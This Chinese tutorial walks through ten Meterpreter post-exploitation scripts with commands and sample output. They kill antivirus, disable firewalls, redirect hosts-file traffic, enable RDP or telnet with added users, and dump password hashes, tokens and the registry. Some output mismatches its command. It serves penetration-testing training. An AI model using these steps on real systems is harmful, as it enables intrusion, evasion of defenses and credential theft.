Metasploit 现有的Meterpreter脚本

Metasploit脚本

Metasploit附带了大量有用的脚本，可以帮助您在Metasploit框架中使用。这些脚本通常由第三方制作并最终被纳入Subversion版本库。我们将通读其中的一些内容，并引导您了解如何在自己的渗透测试中使用它们。

下面提到的脚本旨在成功折衷目标后与Meterpreter shell一起使用。一旦您获得了目标会话，就可以利用这些脚本来最好地满足您的需求。

 

内容

1、checkvm

2、getcountermeasure

3、getgui

4、get_local_subnets

5、gettelnet

6、hostsedit

7、killav

8、remotewinenum

9、scraper

10、winenum

 

一、checkvm

顾名思义，'checkvm'脚本会检查是否exploit虚拟机。这些信息可能非常有用。

meterpreter > run checkvm  
 
 [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
 [*] This is a VMware Workstation/Fusion Virtual Machine

 

二、getcountermeasure

'getcountermeasure'脚本检查受害者系统上的安全配置，并可以禁用其他安全措施，例如A/V，防火墙等等。

meterpreter > run getcountermeasure 
 
 [*] Running Getcountermeasure on the target... 
 [*] Checking for contermeasures...
 [*] Getting Windows Built in Firewall configuration...
 [*]    
 [*]     Domain profile configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]     Exception mode                    = Enable
 [*]    
 [*]     Standard profile configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]     Exception mode                    = Enable
 [*]    
 [*]     Local Area Connection 6 firewall configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]    
 [*] Checking DEP Support Policy...

 

三、getgui

'getgui'脚本用于在目标系统上启用RDP（远程桌面协议）。

meterpreter > run getgui 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u  -p 
Or:    getgui -e

OPTIONS:

    -e   仅启用RDP。
    -f   转发RDP连接。
    -h   帮助菜单。
    -p   要添加的用户的密码。
    -u   要添加的用户的用户名
 
 meterpreter > run getgui -e
 
 [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
 [*] Carlos Perez carlos_perez@darkoperator.com
 [*] Enabling Remote Desktop
 [*] RDP is already enabled
 [*] Setting Terminal Services service startup mode
 [*] Terminal Services service is already set to auto
 [*] Opening port in local firewall if necessary

 

四、get_local_subnets

'get_local_subnets'脚本用于获取受害者的本地子网掩码。这可能是非常有用的旋转信息。

 meterpreter > run get_local_subnets 
 
 Local subnet: 10.211.55.0/255.255.255.0

 

五、gettelnet

'gettelnet'脚本用于在受害者禁用时启用telnet。

meterpreter > run gettelnet 
Windows Telnet Server Enabler Meterpreter Script
Usage: gettelnet -u  -p 

OPTIONS:

    -e   仅启用Telnet服务器。
    -f   转发Telnet连接。
    -h   帮助菜单。
    -p   要添加的用户的密码
    -u   要添加的用户的用户名。
 
 meterpreter > run gettelnet -e
 
 [*] Windows Telnet Server Enabler Meterpreter Script
 [*] Setting Telnet Server Services service startup mode
 [*] The Telnet Server Services service is not set to auto, changing it to auto ...
 [*] Opening port in local firewall if necessary

 

六、hostsedit

'hostsedit' Meterpreter脚本用于将条目添加到Windows主机文件。由于Windows将首先检查主机文件而不是配置的DNS服务器，它将有助于将流量转向假冒的条目或条目。既可以提供单个条目，也可以为每行包含一个条目的文件提供一系列条目。

meterpreter > run hostsedit 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/inject_host.
[!] Example: run post/windows/manage/inject_host OPTION=value [...]
This Meterpreter script is for adding entries in to the Windows Hosts file.
Since Windows will check first the Hosts file instead of the configured DNS Server
it will assist in diverting traffic to the fake entry or entries. Either a single
entry can be provided or a series of entries provided a file with one per line.

OPTIONS:

    -e   主机条目，格式为IP，主机名。
    -h   帮助选项。
    -l   带有IP，主机名格式的条目列表的文本文件。 每行一个。

Example:


run hostsedit -e 127.0.0.1,google.com

run hostsedit -l /tmp/fakednsentries.txt
 
 meterpreter > run hostsedit -e 10.211.55.162,www.fujieace.com
 [*] Making Backup of the hosts file.
 [*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back
 [*] Adding Record for Host www.microsoft.com with IP 10.211.55.162
 [*] Clearing the DNS Cache

 

七、killav

'killav'脚本可用于禁用大多数作为目标服务运行的防病毒程序。

meterpreter > run killav 
 
 [*] Killing Antivirus services on the target...
 [*] Killing off cmd.exe...

 

八、remotewinenum

'remotewinenum'脚本将通过wmic向受害者列举系统信息。记下日志的存储位置。

meterpreter > run remotewinenum

[!] Meterpreter scripts are deprecated. Try post/windows/gather/wmic_command.
[!] Example: run post/windows/gather/wmic_command OPTION=value [...]
Remote Windows Enumeration Meterpreter Script
This script will enumerate windows hosts in the target enviroment
given a username and password or using the credential under witch
Meterpeter is running using WMI wmic windows native tool.
Usage:

OPTIONS:

    -h   帮助菜单。
    -p   目标系统上的用户密码
    -t   目标地址
    -u   目标系统上的用户（如果未提供，它将使用进程的凭证）
 
 meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128
 
 [*] Saving report to /root/.msf4/logs/remotewinenum/10.211.55.128_20170711.0142 
 [*] Running WMIC Commands ....
 [*]     running command wimic environment list
 [*]     running command wimic share list
 [*]     running command wimic nicconfig list
 [*]     running command wimic computersystem list
 [*]     running command wimic useraccount list
 [*]     running command wimic group list
 [*]     running command wimic sysaccount list
 [*]     running command wimic volume list brief
 [*]     running command wimic logicaldisk get description,filesystem,name,size
 [*]     running command wimic netlogin get name,lastlogon,badpasswordcount
 [*]     running command wimic netclient list brief
 [*]     running command wimic netuse get name,username,connectiontype,localname
 [*]     running command wimic share get name,path
 [*]     running command wimic nteventlog get path,filename,writeable
 [*]     running command wimic service list brief
 [*]     running command wimic process list brief
 [*]     running command wimic startup list full
 [*]     running command wimic rdtoggle list
 [*]     running command wimic product get name,version
 [*]     running command wimic qfe list

 

九、scraper

'scraper'脚本可以获取更多的系统信息，包括整个注册表。

meterpreter > run scraper
 
 [*] New session on 10.211.55.128:4444...
 [*] Gathering basic system information...
 [*] Dumping password hashes...
 [*] Obtaining the entire registry...
 [*] Exporting HKCU
 [*] Downloading HKCU (C:\WINDOWS\TEMP\LQTEhIqo.reg)
 [*] Cleaning HKCU
 [*] Exporting HKLM
 [*] Downloading HKLM (C:\WINDOWS\TEMP\GHMUdVWt.reg)

 

从上面的例子我们可以看到，我们有很多Meterpreter脚本可以列举大量信息，为我们禁用反病毒，启用RDP等等。

 

十、winenum

'winenum'脚本提供了一个非常详细的窗口枚举工具。它会丢弃令牌，哈希等等。

meterpreter > run winenum 
 
 [*] Running Windows Local Enumerion Meterpreter Script
 [*] New session on 10.211.55.128:4444...
 [*] Saving report to /root/.msf4/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt
 [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
 [*]     This is a VMware Workstation/Fusion Virtual Machine 
 [*] Running Command List ...
 [*]     running command cmd.exe /c set
 [*]     running command arp -a
 [*]     running command ipconfig /all
 [*]     running command ipconfig /displaydns
 [*]     running command route print
 [*]     running command net view
 [*]     running command netstat -nao
 [*]     running command netstat -vb
 [*]     running command netstat -ns
 [*]     running command net accounts
 [*]     running command net accounts /domain
 [*]     running command net session
 [*]     running command net share
 [*]     running command net group
 [*]     running command net user
 [*]     running command net localgroup
 [*]     running command net localgroup administrators
 [*]     running command net group administrators
 [*]     running command net view /domain
 [*]     running command netsh firewall show config
 [*]     running command tasklist /svc
 [*]     running command tasklist /m
 [*]     running command gpresult /SCOPE COMPUTER /Z
 [*]     running command gpresult /SCOPE USER /Z
 [*] Running WMIC Commands ....
 [*]     running command wmic computersystem list brief
 [*]     running command wmic useraccount list
 [*]     running command wmic group list
 [*]     running command wmic service list brief
 [*]     running command wmic volume list brief
 [*]     running command wmic logicaldisk get description,filesystem,name,size
 [*]     running command wmic netlogin get name,lastlogon,badpasswordcount
 [*]     running command wmic netclient list brief
 [*]     running command wmic netuse get name,username,connectiontype,localname
 [*]     running command wmic share get name,path
 [*]     running command wmic nteventlog get path,filename,writeable
 [*]     running command wmic process list brief
 [*]     running command wmic startup list full
 [*]     running command wmic rdtoggle list
 [*]     running command wmic product get name,version
 [*]     running command wmic qfe
 [*] Extracting software list from registry
 [*] Finished Extraction of software list from registry
 [*] Dumping password hashes...
 [*] Hashes Dumped
 [*] Getting Tokens...
 [*] All tokens have been processed
 [*] Done!